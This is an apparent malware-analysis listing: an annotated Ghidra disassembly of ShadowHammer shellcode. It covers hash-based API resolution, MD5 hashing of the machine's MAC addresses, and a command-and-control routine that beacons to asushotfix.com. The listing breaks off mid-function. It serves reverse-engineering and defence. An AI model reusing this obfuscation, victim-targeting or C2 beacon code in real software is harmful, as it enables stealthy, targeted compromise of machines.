;pipeDecoder.py
;~/samples/ShadowHammer/decoder 22016
;
;[send: 0x195e00, decoded: 0x5600]
ram:00000000 c4 ?? C4h
ram:00000001 3a ?? 3Ah :
ram:00000002 c9 ?? C9h
ram:00000003 c0 ?? C0h
ram:00000004 59 ?? 59h Y
ram:00000005 29 ?? 29h )
ram:00000006 29 ?? 29h )
ram:00000007 86 ?? 86h
ram:00000008 00560000 uint 5600h
ram:0000000c 00 ?? 00h
ram:0000000d 00 ?? 00h
ram:0000000e 00 ?? 00h
ram:0000000f 00 ?? 00h
;********************************************************************************************************
;* FUNCTION *
;********************************************************************************************************
;int getAddrByHash(IMAGE_DOS_HEADER * dllbase, uint hash)
;dllbase IMAGE_DOS_H... 4 ;XREF[2,0]: 00000017,0000007d
;hash uint 8 ;XREF[1,0]: 00000083
;export_dir IMAGE_EXPOR... EAX ;XREF[1,0]: 00000021
;name char * ECX ;XREF[1,0]: 00000073
;i int -8 ;XREF[4,0]: 00000039,0000004a,00000088,0000008b
;running_hash int -c ;XREF[4,0]: 00000057,00000068,00000076,00000080
;local_10 undefined4 -10 ;XREF[2,0]: 0000003c,0000008e
;local_14 undefined4 -14 ;XREF[2,0]: 0000005f,00000095
;c char HASH...
;XREF[3,0]: 000002ae,00001015,00001028
ram:00000010 55 PUSH EBP
ram:00000011 8bec MOV EBP,ESP
ram:00000013 83ec10 SUB ESP,0x10
ram:00000016 53 PUSH EBX
ram:00000017 8b5d08 MOV EBX,dword ptr [EBP + dllbase+0x4]
ram:0000001a 8b433c MOV EAX,dword ptr [EBX + 0x3c]
ram:0000001d 8b441878 MOV EAX,dword ptr [EAX + EBX*0x1 + 0x78]
;from base address of dll `dllbase` get the export directory `export_dir` by traversing the PE header though the optional header, etc.
ram:00000021 03c3 ADD export_dir,EBX
ram:00000023 8b5020 MOV EDX,dword ptr [EAX + export_dir->Addr...
ram:00000026 56 PUSH ESI
ram:00000027 8b701c MOV ESI,dword ptr [EAX + export_dir->Addr...
ram:0000002a 57 PUSH EDI
ram:0000002b 8b7824 MOV EDI,dword ptr [EAX + export_dir->Addr...
ram:0000002e 8b4018 MOV export_dir,dword ptr [EAX + export_di...
ram:00000031 33c9 XOR ECX,ECX
ram:00000033 03d3 ADD EDX,EBX
ram:00000035 03f3 ADD ESI,EBX
ram:00000037 03fb ADD EDI,EBX
ram:00000039 894dfc MOV dword ptr [EBP + i+0x4],ECX
ram:0000003c 8945f4 MOV dword ptr [EBP +...,export_dir
ram:0000003f 85c0 TEST export_dir,export_dir
;iterate over all names in the export directory
ram:00000041 7f0a JG LAB_0000004d
LAB_00000043: ;XREF[1,0]: 00000093
ram:00000043 33c0 XOR export_dir,export_dir
LAB_00000045: ;XREF[1,0]: 00000098
ram:00000045 5f POP EDI
ram:00000046 5e POP ESI
ram:00000047 5b POP EBX
ram:00000048 c9 LEAVE
;in case there is no match return 0
ram:00000049 c3 RET
LAB_0000004a: ;XREF[1,0]: 00000091
ram:0000004a 8b4dfc MOV ECX,dword ptr [EBP + i+0x4]
LAB_0000004d: ;XREF[1,0]: 00000041
ram:0000004d 0fb7044f MOVZX export_dir,word ptr [EDI + ECX*0x2]
ram:00000051 8b0486 MOV export_dir,dword ptr [ESI + export_di...
ram:00000054 8b0c8a MOV ECX,dword ptr [EDX + ECX*0x4]
;calculate a hash over the name, see `hash.c` for standalone implementation
ram:00000057 8365f800 AND dword ptr [EBP + running_hash+0x4],0x0
ram:0000005b 03c3 ADD export_dir,EBX
ram:0000005d 03cb ADD ECX,EBX
ram:0000005f 8945f0 MOV dword ptr [EBP +...,export_dir
ram:00000062 8a01 MOV export_dir,byte ptr [ECX]
ram:00000064 84c0 TEST export_dir,export_dir
ram:00000066 7418 JZ LAB_00000080
LAB_00000068: ;XREF[1,0]: 0000007b
ram:00000068 8b5df8 MOV EBX,dword ptr [EBP + running_hash+0x4]
ram:0000006b 6bdb21 IMUL EBX,EBX,0x21
ram:0000006e 0fbec0 MOVSX export_dir,export_dir
ram:00000071 03d8 ADD EBX,export_dir
ram:00000073 41 INC name
ram:00000074 8a01 MOV export_dir,byte ptr [name]
ram:00000076 895df8 MOV dword ptr [EBP + running_hash+0x4],EBX
ram:00000079 84c0 TEST export_dir,export_dir
ram:0000007b 75eb JNZ LAB_00000068
ram:0000007d 8b5d08 MOV EBX,dword ptr [EBP + dllbase+0x4]
LAB_00000080: ;XREF[1,0]: 00000066
ram:00000080 8b45f8 MOV export_dir,dword ptr [EBP + running_h...
ram:00000083 3b450c CMP export_dir,dword ptr [EBP + hash+0x4]
;if the hash matches the requested hash return the address of the function
ram:00000086 740d JZ LAB_00000095
ram:00000088 ff45fc INC dword ptr [EBP + i+0x4]
ram:0000008b 8b45fc MOV export_dir,dword ptr [EBP + i+0x4]
ram:0000008e 3b45f4 CMP export_dir,dword ptr [EBP + local_10+...
;iterate over all the names in the export directory
ram:00000091 7cb7 JL LAB_0000004a
ram:00000093 ebae JMP LAB_00000043
LAB_00000095: ;XREF[1,0]: 00000086
ram:00000095 8b45f0 MOV export_dir,dword ptr [EBP + local_14+...
ram:00000098 ebab JMP LAB_00000045
;********************************************************************************************************
;* FUNCTION *
;* *
;* resolves the import hashes and stores the resulting function pointers in the func_ptr_table[] array *
;********************************************************************************************************
;undefined import_resolution(func_ptr_table_t * func_ptr_table)
;func_ptr_t... func_ptr_ta... 4 ;XREF[2,0]: 00000273,0000028e
;j int EBX ;XREF[1,0]: 00000271
;ptr int * ESI ;XREF[1,0]: 000002a8
;addr int EAX ;XREF[1,0]: 000002ae
;i int -8 ;XREF[3,0]: 00000282,000002c1,000002c4
;local_c undefined4 -c ;XREF[3,0]: 0000026e,0000028b,000002bb
;local_10 undefined4 -10 ;XREF[2,0]: 000002a0,000002a5
;dllBase IMAGE_DOS_H... -14 ;XREF[2,0]: 0000027f,000002ab
;num_imports uint[5] -28 ;XREF[1,4]: 000000a9,000000ac,000000f3,000000fa,00000101
;import_str... uint[4] -38 ;XREF[2,3]: 000000f0,00000187,0000018e,00000195,0000019c
;import_str... uint[5] -4c ;XREF[2,4]: 000000dd,00000168,0000016f,00000176,0000017d
; 00000184
;import_dlls uint[5] -60 ;XREF[1,4]: 000000c9,000000cf,000000da,000000ed,0000026b
;import_str... uint[4] -78 ;XREF[2,3]: 000000cc,0000014a,000000b4,000000b7,0000014d
;import_str... uint[6] -90 ;XREF[2,5]: 000000d2,00000156,000000ba,000000c0,0000015c
; 00000162,00000165
;import_str... uint[7] -ac ;XREF[2,6]: 000000c3,00000108,00000112,0000011c,00000126
; 00000130,0000013a,00000144
;hashes uint[20] -fc ;XREF[2,19]: 000001a3,00000295,000001ad,000001b7,000001c1
; 000001cb,000001d5,000001df,000001e9,000001f3
; 000001fd,00000207,00000211,0000021b,00000225
; 0000022f,00000239,00000243,0000024d,00000257
; 00000261
;XREF[1,0]: 00001040
ram:0000009a 55 PUSH EBP
ram:0000009b 8bec MOV EBP,ESP
ram:0000009d 81ecf8000000 SUB ESP,0xf8
ram:000000a3 53 PUSH EBX
ram:000000a4 56 PUSH ESI
ram:000000a5 57 PUSH EDI
ram:000000a6 6a06 PUSH 0x6
ram:000000a8 58 POP EAX
ram:000000a9 8945dc MOV dword ptr [EBP + num_imports[0]+0x4],EAX
ram:000000ac 8945e0 MOV dword ptr [EBP + num_imports[1]+0x4],EAX
ram:000000af b864006c00 MOV EAX,0x6c0064
ram:000000b4 894590 MOV dword ptr [EBP +...,EAX
ram:000000b7 894598 MOV dword ptr [EBP +...,EAX
ram:000000ba 898578ffffff MOV dword ptr [impor...,EAX
ram:000000c0 894580 MOV dword ptr [EBP +...,EAX
;kernel32.dll string
ram:000000c3 8d8558ffffff LEA EAX=>import_strings0,[0xffffff58 + EBP]
ram:000000c9 8945a4 MOV dword ptr [EBP + import_dlls[0]+0x4],EAX
;ntdll.dll
ram:000000cc 8d458c LEA EAX=>import_strings1,[EBP + -0x74]
ram:000000cf 8945a8 MOV dword ptr [EBP + import_dlls[1]+0x4],EAX
ram:000000d2 8d8574ffffff LEA EAX=>import_strings2,[0xffffff74 + EBP]
ram:000000d8 33ff XOR EDI,EDI
ram:000000da 8945ac MOV dword ptr [EBP + import_dlls[2]+0x4],EAX
;IPHLPAPI.dll
ram:000000dd 8d45b8 LEA EAX=>import_string3,[EBP + -0x48]
ram:000000e0 6a6c PUSH 0x6c
ram:000000e2 be6e007400 MOV ESI,0x74006e
ram:000000e7 ba6c002e00 MOV EDX,0x2e006c
ram:000000ec 59 POP ECX
ram:000000ed 8945b0 MOV dword ptr [EBP + import_dlls[3]+0x4],EAX
;wininet.dll
ram:000000f0 8d45cc LEA EAX=>import_string4,[EBP + -0x34]
ram:000000f3 c745e4030... MOV dword ptr [EBP + num_imports[2]+0x4],0x3
ram:000000fa c745e8010... MOV dword ptr [EBP + num_imports[3]+0x4],0x1
ram:00000101 c745ec040... MOV dword ptr [EBP + num_imports[4]+0x4],0x4
;kernel32.dll
ram:00000108 c78558fff... MOV dword ptr [impor...,0x65006b
ram:00000112 c7855cfff... MOV dword ptr [impor...,0x6e0072
ram:0000011c c78560fff... MOV dword ptr [impor...,0x6c0065
ram:00000126 c78564fff... MOV dword ptr [impor...,0x320033
ram:00000130 c78568fff... MOV dword ptr [impor...,0x64002e
ram:0000013a c7856cfff... MOV dword ptr [impor...,0x6c006c
ram:00000144 89bd70ffffff MOV dword ptr [impor...,EDI
;ntdll.dll
ram:0000014a 89758c MOV dword ptr [EBP +...,ESI
ram:0000014d 895594 MOV dword ptr [EBP +...,EDX
ram:00000150 894d9c MOV dword ptr [EBP + Stack[-0x68]+0x4],ECX
ram:00000153 897da0 MOV dword ptr [EBP + Stack[-0x64]+0x4],EDI
ram:00000156 89b574ffffff MOV dword ptr [impor...,ESI
ram:0000015c 89957cffffff MOV dword ptr [impor...,EDX
ram:00000162 894d84 MOV dword ptr [EBP +...,ECX
ram:00000165 897d88 MOV dword ptr [EBP +...,EDI
;IPHLPAPI
ram:00000168 c745b8490... MOV dword ptr [EBP +...,0x500049
ram:0000016f c745bc480... MOV dword ptr [EBP +...,0x4c0048
ram:00000176 c745c0500... MOV dword ptr [EBP +...,0x410050
ram:0000017d c745c4500... MOV dword ptr [EBP +...,0x490050
ram:00000184 897dc8 MOV dword ptr [EBP +...,EDI
;wininet
ram:00000187 c745cc770... MOV dword ptr [EBP +...,0x690077
ram:0000018e c745d06e0... MOV dword ptr [EBP +...,0x69006e
ram:00000195 c745d46e0... MOV dword ptr [EBP +...,0x65006e
ram:0000019c c745d8740... MOV dword ptr [EBP +...,0x74
;The hashes define the following functions (in that order):
;
;
; LPVOID (* VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
; DWORD (* GetModuleFileNameW)(HMODULE, LPWSTR, DWORD);
; WINBOOL (* WritePrivateProfileStringW)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR);
; void (* GetSystemTimeAsFileTime)(LPFILETIME);
; WINBOOL (* FileTimeToSystemTime)(FILETIME *, LPSYSTEMTIME);
; WINBOOL (* VirtualFree)(LPVOID, SIZE_T, DWORD);
; void * (* memcpy)(void *, void *, size_t);
; int (* memcmp)(void *, void *, size_t);
; void * (* memset)(void *, int, size_t);
; int (* swprintf)(wchar_t *, size_t, wchar_t *, ...);
; int (* sprintf)(char *, char *, ...);
; char * (* strncat)(char *, char *, size_t);
; int MD5Init;
; int MD5Update;
; int MD5Final;
; int GetAdaptersAddresses;
; HINTERNET (* InternetOpenA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD);
; HINTERNET (* InternetOpenUrlA)(HINTERNET, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR);
; WINBOOL (* InternetQueryDataAvailable)(HINTERNET, LPDWORD, DWORD, DWORD_PTR);
; WINBOOL (* InternetReadFile)(HINTERNET, LPVOID, DWORD, LPDWORD);
;
ram:000001a3 c78508fff... MOV dword ptr [hashe...,0xdf894b12
ram:000001ad c7850cfff... MOV dword ptr [hashe...,0xb5114d1e
ram:000001b7 c78510fff... MOV dword ptr [hashe...,0xe06c4b85
ram:000001c1 c78514fff... MOV dword ptr [hashe...,0x1a6f40d7
ram:000001cb c78518fff... MOV dword ptr [hashe...,0x79ea1906
ram:000001d5 c7851cfff... MOV dword ptr [hashe...,0x7b260749
ram:000001df c78520fff... MOV dword ptr [hashe...,0x5a370cb
ram:000001e9 c78524fff... MOV dword ptr [hashe...,0x5a3705f
ram:000001f3 c78528fff... MOV dword ptr [hashe...,0x5a3b36b
ram:000001fd c7852cfff... MOV dword ptr [hashe...,0xf77105bd
ram:00000207 c78530fff... MOV dword ptr [hashe...,0xa1f571a6
ram:00000211 c78534fff... MOV dword ptr [hashe...,0xab4ca0df
ram:0000021b c78538fff... MOV dword ptr [hashe...,0xc9cc0d1a
ram:00000225 c7853cfff... MOV dword ptr [hashe...,0x8922d4c9
ram:0000022f c78540fff... MOV dword ptr [hashe...,0x314bc30
ram:00000239 c78544fff... MOV dword ptr [hashe...,0x9acb1212
ram:00000243 c78548fff... MOV dword ptr [hashe...,0x87b21b7c
ram:0000024d c7854cfff... MOV dword ptr [hashe...,0xd19124af
ram:00000257 c78550fff... MOV dword ptr [hashe...,0xe8baa2fa
ram:00000261 c78554fff... MOV dword ptr [hashe...,0x3d840fa5
ram:0000026b 8945b4 MOV dword ptr [EBP + import_dlls[4]+0x4],EAX
ram:0000026e 897df8 MOV dword ptr [EBP + local_c+0x4],EDI
ram:00000271 33db XOR j,j
LAB_00000273: ;XREF[1,0]: 000002d3
ram:00000273 8b7508 MOV ESI,dword ptr [EBP + func_ptr_table+0x4]
ram:00000276 6a08 PUSH 0x8
ram:00000278 57 PUSH EDI
ram:00000279 ff741da4 PUSH dword ptr [EBP + j*0x1 + -0x5c]
ram:0000027d ff16 CALL dword ptr [ESI]
ram:0000027f 8945f0 MOV dword ptr [EBP + dllBase+0x4],EAX
ram:00000282 897dfc MOV dword ptr [EBP + i+0x4],EDI
ram:00000285 397c1ddc CMP dword ptr [EBP + j*0x1 + -0x24],EDI
ram:00000289 7e42 JLE LAB_000002cd
ram:0000028b 8b45f8 MOV EAX,dword ptr [EBP + local_c+0x4]
ram:0000028e 8b4d08 MOV ECX,dword ptr [EBP + func_ptr_table+0x4]
ram:00000291 8d748604 LEA ESI,[ESI + EAX*0x4 + 0x4]
ram:00000295 8d8508ffffff LEA EAX=>hashes,[0xffffff08 + EBP]
ram:0000029b 83c104 ADD ECX,0x4
ram:0000029e 2bc1 SUB EAX,ECX
ram:000002a0 8945f4 MOV dword ptr [EBP + local_10+0x4],EAX
ram:000002a3 eb03 JMP LAB_000002a8
LAB_000002a5: ;XREF[1,0]: 000002cb
ram:000002a5 8b45f4 MOV EAX,dword ptr [EBP + local_10+0x4]
LAB_000002a8: ;XREF[1,0]: 000002a3
ram:000002a8 ff3430 PUSH dword ptr [EAX + ptr*0x1]
ram:000002ab ff75f0 PUSH dword ptr [EBP + dllBase+0x4]
;here is a Ghidra bug(?) ... the decompiler lists register0x00000010 which can not be changed nor adapted
ram:000002ae e85dfdffff CALL getAddrByHash ;int getAddrByHash(IMAGE_DOS_HEADER *...
ram:000002b3 59 POP ECX
ram:000002b4 59 POP ECX
ram:000002b5 8906 MOV dword ptr [ptr],addr
ram:000002b7 3bc7 CMP addr,EDI
ram:000002b9 7422 JZ LAB_000002dd
ram:000002bb ff45f8 INC dword ptr [EBP + local_c+0x4]
ram:000002be 83c604 ADD ptr,0x4
ram:000002c1 ff45fc INC dword ptr [EBP + i+0x4]
ram:000002c4 8b45fc MOV addr,dword ptr [EBP + i+0x4]
ram:000002c7 3b441ddc CMP addr,dword ptr [EBP + j*0x1 + -0x24]
ram:000002cb 7cd8 JL LAB_000002a5
LAB_000002cd: ;XREF[1,0]: 00000289
ram:000002cd 83c304 ADD j,0x4
ram:000002d0 83fb14 CMP j,0x14
ram:000002d3 7c9e JL LAB_00000273
ram:000002d5 33c0 XOR addr,addr
ram:000002d7 40 INC addr
LAB_000002d8: ;XREF[1,0]: 000002df
ram:000002d8 5f POP EDI
ram:000002d9 5e POP ptr
ram:000002da 5b POP j
ram:000002db c9 LEAVE
ram:000002dc c3 RET
LAB_000002dd: ;XREF[1,0]: 000002b9
ram:000002dd 33c0 XOR addr,addr
ram:000002df ebf7 JMP LAB_000002d8
;********************************************************************************************************
;*Query `GetAdapterAddresses` and depending on the `only_check_count` parameter only return the number ...*
;********************************************************************************************************
;int md5_mac(void * buffer, int only_check_count, func_ptr_table_t * func_ptrs)
;buffer void * 4 ;XREF[1,0]: 00000328
;only_check... int 8 ;XREF[1,0]: 00000333
;func_ptrs func_ptr_ta... ESI
;ret ULONG EAX ;XREF[1,0]: 000002f6
;alloced_bu... LPVOID EAX ;XREF[1,0]: 0000030d
;ret2 int EAX ;XREF[1,0]: 0000031a
;size SIZE_T -8 ;XREF[4,0]: 000002eb,000002f3,00000309,00000312
;buffer_ptr void * -c ;XREF[3,0]: 0000032b,00000359,00000365
;num_adapters int -10 ;XREF[3,0]: 00000321,00000362,00000370
;md5_ctx_ish uint[27] -7c ;XREF[3,1]: 00000338,00000345,0000034c,00000355
;XREF[2,0]: 00000f2a,00000f57
ram:000002e1 55 PUSH EBP
ram:000002e2 8bec MOV EBP,ESP
ram:000002e4 83ec78 SUB ESP,0x78
ram:000002e7 53 PUSH EBX
ram:000002e8 57 PUSH EDI
ram:000002e9 33db XOR EBX,EBX
ram:000002eb 8d45fc LEA EAX=>size,[EBP + -0x4]
ram:000002ee 50 PUSH EAX
ram:000002ef 53 PUSH EBX
ram:000002f0 53 PUSH EBX
ram:000002f1 53 PUSH EBX
ram:000002f2 53 PUSH EBX
ram:000002f3 895dfc MOV dword ptr [EBP + size+0x4],EBX
ram:000002f6 ff5640 CALL dword ptr [ESI + func_ptrs->GetAdapte...
ram:000002f9 83f86f CMP ret,ERROR_BUFFER_OVERFLOW
ram:000002fc 7404 JZ LAB_00000302
ram:000002fe 33c0 XOR ret,ret
ram:00000300 eb71 JMP LAB_00000373
LAB_00000302: ;XREF[1,0]: 000002fc
ram:00000302 6a04 PUSH PAGE_READWRITE
ram:00000304 6800100000 PUSH MEM_COMMIT
ram:00000309 ff75fc PUSH dword ptr [EBP + size+0x4]
ram:0000030c 53 PUSH EBX
ram:0000030d ff5604 CALL dword ptr [ESI + func_ptrs->VirtualAl...
ram:00000310 8bf8 MOV EDI,alloced_buffer
ram:00000312 8d45fc LEA alloced_buffer=>size,[EBP + -0x4]
ram:00000315 50 PUSH alloced_buffer
ram:00000316 57 PUSH EDI
ram:00000317 53 PUSH EBX
ram:00000318 53 PUSH EBX
ram:00000319 53 PUSH EBX
ram:0000031a ff5640 CALL dword ptr [ESI + func_ptrs->GetAdapte...
ram:0000031d 85c0 TEST ret2,ret2
ram:0000031f 754f JNZ LAB_00000370
ram:00000321 895df4 MOV dword ptr [EBP + num_adapters+0x4],EBX
ram:00000324 3bfb CMP EDI,EBX
ram:00000326 7448 JZ LAB_00000370
ram:00000328 8b4508 MOV ret2,dword ptr [EBP + buffer+0x4]
ram:0000032b 8945f8 MOV dword ptr [EBP + buffer_ptr+0x4],ret2
LAB_0000032e: ;XREF[1,0]: 0000036e
ram:0000032e 395f34 CMP dword ptr [EDI + 0x34],EBX
ram:00000331 7636 JBE LAB_00000369
ram:00000333 395d0c CMP dword ptr [EBP +...,EBX
ram:00000336 752a JNZ LAB_00000362
ram:00000338 8d4588 LEA ret2=>md5_ctx_ish,[EBP + -0x78]
ram:0000033b 50 PUSH ret2
ram:0000033c ff5634 CALL dword ptr [ESI + func_ptrs->MD5Init]
ram:0000033f 6a06 PUSH 0x6
ram:00000341 8d472c LEA ret2,[EDI + 0x2c]
ram:00000344 50 PUSH ret2
ram:00000345 8d4588 LEA ret2=>md5_ctx_ish,[EBP + -0x78]
ram:00000348 50 PUSH ret2
ram:00000349 ff5638 CALL dword ptr [ESI + func_ptrs->MD5Update]
ram:0000034c 8d4588 LEA ret2=>md5_ctx_ish,[EBP + -0x78]
ram:0000034f 50 PUSH ret2
ram:00000350 ff563c CALL dword ptr [ESI + func_ptrs->MD5Final]
ram:00000353 6a10 PUSH 0x10
ram:00000355 8d45e0 LEA ret2=>md5_ctx_ish[22],[EBP + -0x20]
ram:00000358 50 PUSH ret2
ram:00000359 ff75f8 PUSH dword ptr [EBP + buffer_ptr+0x4]
ram:0000035c ff561c CALL dword ptr [ESI + func_ptrs->memcpy]
ram:0000035f 83c40c ADD ESP,0xc
LAB_00000362: ;XREF[1,0]: 00000336
ram:00000362 ff45f4 INC dword ptr [EBP + num_adapters+0x4]
ram:00000365 8345f814 ADD dword ptr [EBP + buffer_ptr+0x4],0x14
LAB_00000369: ;XREF[1,0]: 00000331
ram:00000369 8b7f08 MOV EDI,dword ptr [EDI + 0x8]
ram:0000036c 3bfb CMP EDI,EBX
ram:0000036e 75be JNZ LAB_0000032e
LAB_00000370: ;XREF[2,0]: 0000031f,00000326
ram:00000370 8b45f4 MOV ret2,dword ptr [EBP + num_adapters+0x4]
LAB_00000373: ;XREF[1,0]: 00000300
ram:00000373 5f POP EDI
ram:00000374 5b POP EBX
ram:00000375 c9 LEAVE
ram:00000376 c3 RET
;********************************************************************************************************
;* FUNCTION *
;********************************************************************************************************
;void C2(mac_md5_list_entry_t * md5s_of_thismachine, func_ptr_table_t * func_ptrs)
;md5s_of_th... mac_md5_lis... 4 ;XREF[4,0]: 0000043a,000004c0,000004ec,00000500
;func_ptrs func_ptr_ta... ESI
;__src uint * EAX ;XREF[1,0]: 00000465
;__dest char * EDI ;XREF[1,0]: 00000472
;hInternet HINTERNET EAX ;XREF[1,0]: 000004a6
;buffer uint * EAX ;XREF[1,0]: 000004d4
;num_bytes_... DWORD -8 ;XREF[4,0]: 000004df,000004fc,00000503,00000509
;question_m... undefined2[2] -c ;XREF[2,0]: 0000038e,0000047d
;fmt_str uint[2] -14 ;XREF[2,1]: 0000041d,0000044d,00000424
;i uint -18 ;XREF[4,0]: 00000427,0000043d,0000046f,00000475
;num_bytes_... DWORD -1c ;XREF[3,0]: 000004db,000004e2,000004f2
;hex_str uint[3] -28 ;XREF[3,1]: 00000432,00000451,00000462,0000045a
;local_2c undefined4 -2c ;XREF[1,0]: 00000414
;local_30 undefined4 -30 ;XREF[1,0]: 00000411
;local_34 undefined4 -34 ;XREF[1,0]: 0000040e
;local_38 undefined4 -38 ;XREF[1,0]: 0000040b
;local_3c undefined4 -3c ;XREF[1,0]: 00000408
;local_40 undefined4 -40 ;XREF[1,0]: 00000405
;local_44 undefined4 -44 ;XREF[1,0]: 00000402
;local_48 undefined4 -48 ;XREF[1,0]: 000003ff
;local_4c undefined4 -4c ;XREF[1,0]: 000003fc
;local_50 undefined4 -50 ;XREF[1,0]: 000003f9
;local_54 undefined4 -54 ;XREF[1,0]: 000003f6
;local_58 undefined4 -58 ;XREF[1,0]: 000003f3
;local_5c undefined4 -5c ;XREF[1,0]: 000003f0
;url int[9] -98 ;XREF[4,8]: 00000394,00000481,00000494,000004b5,0000039e
; 000003a8,000003b2,000003bc,000003c6,000003cd
; 000003d4,000003db
;beacon_str char[64] -d8 ;XREF[3,0]: 00000386,0000042a,0000048d
;b byte HASH...
;XREF[1,0]: 00000f9a
ram:00000377 55 PUSH EBP
ram:00000378 8bec MOV EBP,ESP
ram:0000037a 81ecd4000000 SUB ESP,0xd4
ram:00000380 53 PUSH EBX
ram:00000381 33db XOR EBX,EBX
ram:00000383 57 PUSH EDI
ram:00000384 6a40 PUSH 0x40
ram:00000386 8d852cffffff LEA EAX=>beacon_str,[0xffffff2c + EBP]
ram:0000038c 53 PUSH EBX
ram:0000038d 50 PUSH EAX
;SimpleStackStrings.py: ?https://asushotfix.com/logo2.jpg
ram:0000038e 66c745f83f00 MOV word ptr [EBP + ...,0x3f
;SimpleStackStrings.py: https://asushotfix.com/logo2.jpg
ram:00000394 c7856cfff... MOV dword ptr [url[0]+0x4 + EBP],0x70747468
ram:0000039e c78570fff... MOV dword ptr [url[1]+0x4 + EBP],0x2f2f3a73
ram:000003a8 c78574fff... MOV dword ptr [url[2]+0x4 + EBP],0x73757361
ram:000003b2 c78578fff... MOV dword ptr [url[3]+0x4 + EBP],0x66746f68
ram:000003bc c7857cfff... MOV dword ptr [url[4]+0x4 + EBP],0x632e7869
ram:000003c6 c745806f6... MOV dword ptr [EBP + url[5]+0x4],0x6c2f6d6f
ram:000003cd c745846f6... MOV dword ptr [EBP + url[6]+0x4],0x326f676f
ram:000003d4 c745882e6... MOV dword ptr [EBP + url[7]+0x4],0x67706a2e
ram:000003db 895d8c MOV dword ptr [EBP + url[8]+0x4],EBX
ram:000003de 895d90 MOV dword ptr [EBP + Stack[-0x74]+0x4],EBX
ram:000003e1 895d94 MOV dword ptr [EBP + Stack[-0x70]+0x4],EBX
ram:000003e4 895d98 MOV dword ptr [EBP + Stack[-0x6c]+0x4],EBX
ram:000003e7 895d9c MOV dword ptr [EBP + Stack[-0x68]+0x4],EBX
ram:000003ea 895da0 MOV dword ptr [EBP + Stack[-0x64]+0x4],EBX
ram:000003ed 895da4 MOV dword ptr [EBP + Stack[-0x60]+0x4],EBX
ram:000003f0 895da8 MOV dword ptr [EBP + local_5c+0x4],EBX
ram:000003f3 895dac MOV dword ptr [EBP + local_58+0x4],EBX
ram:000003f6 895db0 MOV dword ptr [EBP + local_54+0x4],EBX
ram:000003f9 895db4 MOV dword ptr [EBP + local_50+0x4],EBX
ram:000003fc 895db8 MOV dword ptr [EBP + local_4c+0x4],EBX
ram:000003ff 895dbc MOV dword ptr [EBP + local_48+0x4],EBX
ram:00000402 895dc0 MOV dword ptr [EBP + local_44+0x4],EBX
ram:00000405 895dc4 MOV dword ptr [EBP + local_40+0x4],EBX
ram:00000408 895dc8 MOV dword ptr [EBP + local_3c+0x4],EBX
ram:0000040b 895dcc MOV dword ptr [EBP + local_38+0x4],EBX
ram:0000040e 895dd0 MOV dword ptr [EBP + local_34+0x4],EBX
ram:00000411 895dd4 MOV dword ptr [EBP + local_30+0x4],EBX
ram:00000414 895dd8 MOV dword ptr [EBP + local_2c+0x4],EBX
ram:00000417 ff5624 CALL dword ptr [ESI + func_ptrs->memset]
ram:0000041a 83c40c ADD ESP,0xc
;SimpleStackStrings.py: %02X
ram:0000041d c745f0253... MOV dword ptr [EBP +...,0x58323025
ram:00000424 885df4 MOV byte ptr [EBP + fmt_str[1]+0x4],BL
ram:00000427 895dec MOV dword ptr [EBP + i+0x4],EBX
ram:0000042a 8dbd2cffffff LEA EDI=>beacon_str,[0xffffff2c + EBP]
LAB_00000430: ;XREF[1,0]: 00000479
ram:00000430 6a0c PUSH 0xc
ram:00000432 8d45dc LEA EAX=>hex_str,[EBP + -0x24]
ram:00000435 53 PUSH EBX
ram:00000436 50 PUSH EAX
ram:00000437 ff5624 CALL dword ptr [ESI + func_ptrs->memset]
ram:0000043a 8b4508 MOV EAX,dword ptr [EBP + md5s_of_thismach...
ram:0000043d 8b4dec MOV ECX,dword ptr [EBP + i+0x4]
ram:00000440 8a440104 MOV AL,byte ptr [ECX + EAX*0x1 + 0x4]
ram:00000444 83c40c ADD ESP,0xc
ram:00000447 3c7f CMP AL,0x7f
ram:00000449 0fbec0 MOVSX EAX,AL
ram:0000044c 50 PUSH EAX
ram:0000044d 8d45f0 LEA EAX=>fmt_str,[EBP + -0x10]
ram:00000450 50 PUSH EAX
ram:00000451 8d45dc LEA EAX=>hex_str,[EBP + -0x24]
ram:00000454 50 PUSH EAX
ram:00000455 7608 JBE LAB_0000045f
ram:00000457 ff562c CALL dword ptr [ESI + func_ptrs->sprintf]
ram:0000045a 8d45e2 LEA EAX=>hex_str[1]+0x2,[EBP + -0x1e]
ram:0000045d eb06 JMP LAB_00000465
LAB_0000045f: ;XREF[1,0]: 00000455
ram:0000045f ff562c CALL dword ptr [ESI + func_ptrs->sprintf]
ram:00000462 8d45dc LEA EAX=>hex_str,[EBP + -0x24]
LAB_00000465: ;XREF[1,0]: 0000045d
ram:00000465 6a03 PUSH 0x3
ram:00000467 50 PUSH __src
ram:00000468 57 PUSH EDI
ram:00000469 ff561c CALL dword ptr [ESI + func_ptrs->memcpy]
ram:0000046c 83c418 ADD ESP,0x18
ram:0000046f ff45ec INC dword ptr [EBP + i+0x4]
ram:00000472 83c702 ADD __dest,0x2
ram:00000475 837dec10 CMP dword ptr [EBP + i+0x4],0x10
ram:00000479 72b5 JC LAB_00000430
ram:0000047b 6a02 PUSH 0x2
ram:0000047d 8d45f8 LEA __src=>question_mark_str,[EBP + -0x8]
ram:00000480 50 PUSH __src
ram:00000481 8d856cffffff LEA __src=>url,[0xffffff6c + EBP]
ram:00000487 50 PUSH __src
ram:00000488 ff5630 CALL dword ptr [ESI + func_ptrs->strncat]
ram:0000048b 6a40 PUSH 0x40
ram:0000048d 8d852cffffff LEA __src=>beacon_str,[0xffffff2c + EBP]
ram:00000493 50 PUSH __src
ram:00000494 8d856cffffff LEA __src=>url,[0xffffff6c + EBP]
ram:0000049a 50 PUSH __src
ram:0000049b ff5630 CALL dword ptr [ESI + func_ptrs->strncat]
ram:0000049e 83c418 ADD ESP,0x18
ram:000004a1 53 PUSH EBX
ram:000004a2 53 PUSH EBX
ram:000004a3 53 PUSH EBX
ram:000004a4 53 PUSH EBX
ram:000004a5 53 PUSH EBX
ram:000004a6 ff5644 CALL dword ptr [ESI + func_ptrs->InternetO...
ram:000004a9 3bc3 CMP hInternet,EBX
ram:000004ab 747c JZ LAB_00000529
ram:000004ad 53 PUSH EBX
ram:000004ae 6800018084 PUSH 0x84800100
ram:000004b3 53 PUSH EBX
ram:000004b4 53 PUSH EBX
ram:000004b5 8d8d6cffffff LEA ECX=>url,[0xffffff6c + EBP]
